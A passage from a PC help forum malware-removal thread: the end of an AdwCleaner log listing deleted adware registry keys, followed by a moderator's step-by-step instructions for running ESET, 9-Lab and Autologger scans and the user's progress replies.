                  [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\GoogleChromeUpService
                  [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\GoogleChromeUpService
                  [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\iedvutils
                  [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\iedvutils
                  [#] Key deleted on reboot: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\googlechromeupservice
                  [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\googlechromeupservice
                  [-] Key deleted: HKLM\SOFTWARE\Classes\Standucksc
                  [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Standucksc
                  [-] Key deleted: HKU.DEFAULT\Software\jhtrsq
                  [-] Key deleted: HKU.DEFAULT\Software\UpgSvr
                  [-] Key deleted: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\MICROSOFT\OTUT
                  [-] Key deleted: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\MICROSOFT\wewewe
                  [-] Key deleted: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\PopWnd
                  [-] Key deleted: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Standuck
                  [-] Key deleted: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\deskapp
                  [#] Key deleted on reboot: HKU\S-1-5-18\Software\jhtrsq
                  [#] Key deleted on reboot: HKU\S-1-5-18\Software\UpgSvr
                  [#] Key deleted on reboot: HKCU\Software\MICROSOFT\OTUT
                  [#] Key deleted on reboot: HKCU\Software\MICROSOFT\wewewe
                  [#] Key deleted on reboot: HKCU\Software\PopWnd
                  [#] Key deleted on reboot: HKCU\Software\Standuck
                  [#] Key deleted on reboot: HKCU\Software\deskapp
                  [-] Key deleted: HKLM\SOFTWARE\jhtrsq
                  [-] Key deleted: HKLM\SOFTWARE\mtZaamla
                  [-] Key deleted: HKLM\SOFTWARE\Standuck
                  [-] Key deleted: HKLM\SOFTWARE\msServer
                  [-] Key deleted: HKLM\SOFTWARE{84416237-6490-494D-9AD6-4994DD978971}
                  [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uni nstall{59B5A9CD-253D-4C41-A073-B387D4C9672D}
                  [#] Key deleted on reboot: [x64] HKCU\Software\MICROSOFT\OTUT
                  [#] Key deleted on reboot: [x64] HKCU\Software\MICROSOFT\wewewe
                  [#] Key deleted on reboot: [x64] HKCU\Software\PopWnd
                  [#] Key deleted on reboot: [x64] HKCU\Software\Standuck
                  [#] Key deleted on reboot: [x64] HKCU\Software\deskapp
                  [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft{94ebd7b5-82ae-449t-b679-3d04078ed154}
                  [-] Key deleted: [x64] HKLM\SOFTWARE\EnigmaSoftwareGroup
                  [-] Key deleted: [x64] HKLM\SOFTWARE\jhtrsq
                  [-] Value deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run [gplyra]
                  [#] Key deleted on reboot: HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\AP PLICATION\Application Hosting
                  [-] Key deleted: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
                  [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
                  [-] Key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Zaamla.exe
                  [-] Key deleted: HKCU\SOFTWARE\Classes\ChromeHTML

                  ***** [ Web browsers ] *****

                  [-] [C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
                  [-] [C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com


                  :: “Tracing” keys deleted
                  :: Winsock settings cleared


                  C:\AdwCleaner\AdwCleaner[C0].txt - [4384 Bytes] - [01/04/2017 06:30:15]
                  C:\AdwCleaner\AdwCleaner[S0].txt - [4240 Bytes] - [01/04/2017 06:29:41]

                  ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [4530 Bytes] ##########

                  So I did everything and on the last part where u asked me to scan with ZHPDiag, it gave me an error like the pic that i attached.
                  And I tried to open it again and it says I needed to update it so I clicked on it and it says download completed. And there is a new ZHPDiag but when I ran it, it gave me an error again

                  Comment

                  • herrick
                    PCHF Member
                    • Mar 2017
                    • 55

                    #10
                    hmm Im not sure how it ended up having a line on the text, how do I fix that?

                    Comment

                    • Malnutrition
                      PCHF Moderator
                      • Jul 2016
                      • 7045

                      #11
                      Try and disable your antivirus and run Zhp Diag again… If it will not run then please run FRST again and post the new logs…

                      Either way please run a scan with Eset and 9-Lab then let me know what issues remain on your machine.

                      9-Lab Scan.

                      [ul]
                      [li]Download 9-Lab Removal Tool. [/li][li]CLICK HERE to determine whether you’re running 32-bit or 64-bit for Windows.[/li][li]Disable your antivirus prior to this scan.[/li]
                      [li]Install the program onto your computer, then right click the icon run as administrator.[/li][li]Update the program and then run a Full scan![/li][li]Make sure the program updates, might be better to install it update reboot and check for updates again.[/li][li]You need to make sure the database updates!!![/li][li]Upon Scan Completion Click on Show Results.[/li][li]Then Click On Clean[/li][li]Then Click on Save Log.[/li][li]Save it to your desktop, copy and paste the contents of the log here in your next reply.[/li][/ul]

                      ESET Online Scanner

                      Important note:
                      This scan may take an extended amount of time, make certain your machine does not go to sleep.

                      [ul]
                      [li]Click here to download the installer for ESET Online Scanner and save it to your Desktop.[/li][li]Disable all your antivirus and antimalware software [/li]
                      [li]Right click on esetsmartinstaller_enu.exe and select Run as Administrator.[/li][li]Place a checkmark in YES, I accept the Terms of Use, then click Start. Wait for ESET Online Scanner to load its components.[/li][li]Select Enable detection of potentially unwanted applications.[/li][li]Click Advanced Settings, then place a checkmark in the following:[/li]
                      • [li]Remove found threats[/li][li]Scan archives[/li][li]Scan for potentially unsafe applications[/li][li]Enable Anti-Stealth technology[/li][/ul]
                        [li]Click Start to begin scanning.[/li][li]ESET Online Scanner will start downloading signatures and scan. Please be patient, as this scan can take quite some time.[/li][li]When the scan is done, click List threats (only available if ESET Online Scanner found something).[/li][li]Click Export, then save the file to your desktop.[/li][li]Click Back, then Finish to exit ESET Online Scanner.[/li]

                      Comment

                      • herrick
                        PCHF Member
                        • Mar 2017
                        • 55

                        #12
                        I off my antivirus but it still gave me an error. I re run the FRST and heres the log attached.

                        I am scanning with 9-lab scan atm

                        Comment

                        • Malnutrition
                          PCHF Moderator
                          • Jul 2016
                          • 7045

                          #13
                          Originally posted by herrick
                          I am scanning with 9-lab scan atm
                          Ok, when you post the 9-lab log please let me know how things are running, I am signing off for the night but will check back in tomorrow after work…

                          Since the other tool will not run, we will use this one to have a look…

                          Auto logger scan!

                          [ul]
                          [li]Disable your Antivirus & Anti spyware applications!![/li][li]Download Autologger to your desktop.[/li][li]Unzip it there. – If you are unsure how to unzip a program, then use ---- http://www.7-zip.org/ ----[/li][li]Right click Autologger and run as admin. (Xp user double click)[/li][li]AVZ4 will open and scan your machine, allow this to complete.[/li][li]Upload Collectionlog.zip to your next reply.[/li][li]https://i.imgur.com/KA81Q57.png[/li][/ul]

                          Comment

                          • herrick
                            PCHF Member
                            • Mar 2017
                            • 55

                            #14
                            Wondering if Cheat Engine is ok? Cause most of my cheats are deleted by the scanner.
                            Its a hacktool for gaming, I made hacks through that normally for my games.

                            I will do the last part in a min

                            Comment

                            • herrick
                              PCHF Member
                              • Mar 2017
                              • 55

                              #15
                              Hmm the last part which is autologger gave me this(pic attached).
                              Is that normal? which one should I choose?

                              And the computer is improving imo. Thanks!

                              Comment

                              Working...